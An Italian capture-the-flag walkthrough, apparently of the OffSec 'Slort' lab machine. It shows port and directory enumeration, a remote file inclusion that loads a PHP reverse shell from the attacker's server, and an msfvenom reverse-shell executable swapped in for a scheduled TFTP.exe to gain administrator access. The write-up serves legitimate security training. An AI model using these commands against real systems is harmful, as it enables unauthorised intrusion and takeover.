Slort
Network
- Ip Target:
192.168.106.53
Enumeration
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.106.53
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:41 CET
Nmap scan report for 192.168.106.53
Host is up (0.078s latency).
Not shown: 65520 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
4443/tcp open pharos
5040/tcp open unknown
7680/tcp open pando-pub
8080/tcp open http-proxy
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ sudo nmap -Pn -sC -sV -p21,135,139,445,3306,4443,5040,7680,8080 -oN alltcp.txt 192.168.106.53
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-28 14:43 CET
Nmap scan report for 192.168.106.53
Host is up (0.070s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GetRequest, HTTPOptions, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Host '192.168.45.248' is not allowed to connect to this MariaDB server
4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.106.53:4443/dashboard/
5040/tcp open unknown
7680/tcp closed pando-pub
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.106.53:8080/dashboard/
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=12/28%Time=6770009A%P=aarch64-unknown-linu
SF:x-gnu%r(NULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(GetRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:HTTPOptions,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:RTSPRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:RPCCheck,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNS
SF:StatusRequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x20i
SF:s\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server
SF:")%r(SSLSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.248'\x2
SF:0is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serv
SF:er")%r(TerminalServerCookie,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45
SF:\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaD
SF:B\x20server")%r(TLSSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.
SF:45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(Kerberos,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\
SF:.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB
SF:\x20server")%r(SMBProgNeg,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.
SF:248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\
SF:x20server")%r(FourOhFourRequest,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server")%r(LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.
SF:45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mari
SF:aDB\x20server")%r(LDAPSearchReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server")%r(LDAPBindReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168
SF:\.45\.248'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Ma
SF:riaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-12-28T13:46:35
|_ start_date: N/A
Port 4443,8080
Cerco ulteriori percorsi con gobuster:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[/usr/share/dirb/wordlists]
└─$ sudo gobuster dir -u http://192.168.106.53:8080 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50 --exclude-length "0"
[sudo] password for momphucker:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.106.53:8080
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] Exclude Length: 0
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/img/]
/site (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/site/]
/licenses (Status: 403) [Size: 1205]
/examples (Status: 503) [Size: 1060]
/dashboard (Status: 301) [Size: 351] [--> http://192.168.106.53:8080/dashboard/]
/%20 (Status: 403) [Size: 1046]
/IMG (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/IMG/]
/Site (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/Site/]
/*checkout* (Status: 403) [Size: 1046]
/Img (Status: 301) [Size: 345] [--> http://192.168.106.53:8080/Img/]
/phpmyadmin (Status: 403) [Size: 1205]
/webalizer (Status: 403) [Size: 1046]
/*docroot* (Status: 403) [Size: 1046]
/* (Status: 403) [Size: 1046]
/con (Status: 403) [Size: 1046]
/Dashboard (Status: 301) [Size: 351] [--> http://192.168.106.53:8080/Dashboard/]
/http%3A (Status: 403) [Size: 1046]
/**http%3a (Status: 403) [Size: 1046]
/*http%3A (Status: 403) [Size: 1046]
/xampp (Status: 301) [Size: 347] [--> http://192.168.106.53:8080/xampp/]
/aux (Status: 403) [Size: 1046]
/**http%3A (Status: 403) [Size: 1046]
/%C0 (Status: 403) [Size: 1046]
/SITE (Status: 301) [Size: 346] [--> http://192.168.106.53:8080/SITE/]
[..]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
Su /site esiste un sito in php:
che è vulnerabile ad una Remote File Inclusion (RFI):
Exploit
Apro un webserver sulla mia macchina kali, nella porta 8081, su cui è presente il file php-reverse-shell.php che contiente il codice php della reverse shell di tipo Ivan Sincek presente su revshells.com/.
Metto un listener in ascolto sulla porta 4444:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
Infine chiamo il file per la reverse shell, servito dal mio webserver, in questo modo:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ curl -X GET http://192.168.106.53:8080/site/index.php?page=http://192.168.45.248:8081/php-reverse-shell.php
E si apre la shell:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.106.53] 50774
SOCKET: Shell has connected! PID: 1116
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\site>whoami
slort\rupert
Catturo la flag local.txt:
Privilege Escalation
Nella root è presente la cartella Backup che contiene i seguenti files:
cmd
C:\>dir Backup
Volume in drive C has no label.
Volume Serial Number is 6E11-8C59
Directory of C:\Backup
12/28/2024 09:11 AM <DIR> .
12/28/2024 09:11 AM <DIR> ..
06/12/2020 06:45 AM 11,304 backup.txt
06/12/2020 06:45 AM 73 info.txt
06/23/2020 06:49 PM 73,802 TFTP.exe
4 File(s) 92,347 bytes
2 Dir(s) 28,578,185,216 bytes free
Il file info.txt riporta il seguente contenuto:
Queso lascia intendere che potrebbe esistere un task che esegue TFTP.exe ogni 5 minuti.
Genero quindi un eseguibile per sostituirlo che apra una shell sul listener 4455:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Slort]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=4455 -f exe -o TFTP.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: TFTP.exe
Rinonimo l'eseguibile orginale e carico il payload:
cmd
C:\Backup>ren TFTP.exe TFTP_OLD.exe
C:\Backup>curl http://192.168.45.248:8081/TFTP.exe -O TFTP.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7168 100 7168 0 0 7168 0 0:00:01 --:--:-- 0:00:01 57344
Dopo qualche istante viene aperta la shell come Administrator sul listener in ascolto:
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/…/offsec_/machines/Slort/Backup]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.106.53] 52357
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
slort\administrator
Infine catturo la flag proof.txt:
